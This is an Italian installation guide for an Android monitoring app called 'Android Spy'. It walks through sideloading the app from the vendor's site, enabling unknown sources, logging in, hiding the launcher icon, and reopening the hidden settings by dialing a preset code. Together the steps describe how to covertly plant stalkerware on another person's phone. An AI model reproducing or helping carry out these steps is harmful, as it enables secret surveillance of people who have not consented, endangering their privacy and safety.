Istruzioni per installare Android Spy

1. Avviare il browser Internet sul dispositivo.
2. Vai all'URL https://run.a-spy.com.
3. Si prega di inserire l'indirizzo email e la password dell'account creato sul https://run.a-spy.com. Toccare «Accedi».
4. Toccare «Navigazione». Se si dispone di un display più grande, continuare con il passo successivo.
5. Toccare «Download».
6. Toccare «Download» e scaricare l'applicazione.
7. Aprire il campo di notifica e toccare il download completato.
8. Toccare «Impostazioni».
9. Toccare «Sorgenti sconosciute».
10. Toccare «OK».
11. Toccare «Avanti».
12. Toccare «Installa».
13. Toccare «Apri».
14. Toccare «Accetto».
15. Si prega di inserire l'indirizzo email e la password dell'account creato sul https://run.a-spy.com. Tap on «OK».
16. Toccare «OK».
17. È ora possibile nascondere l'icona del programma di avvio.
18. Toccare «Chiudi», se non si desidera apportare alcuna modifica nelle impostazioni.
19. Per ri-aprire le impostazioni, avviare l'applicazione telefono.
20. Inserire il numero telefonico che è stato impostato nelle impostazioni e toccare «Chiamata». Il numero di telefono è pre-impostato: 0000. Se non si ricorda questo numero di telefono, li troverete sul https://run.a-spy.com sotto «Dispositivi».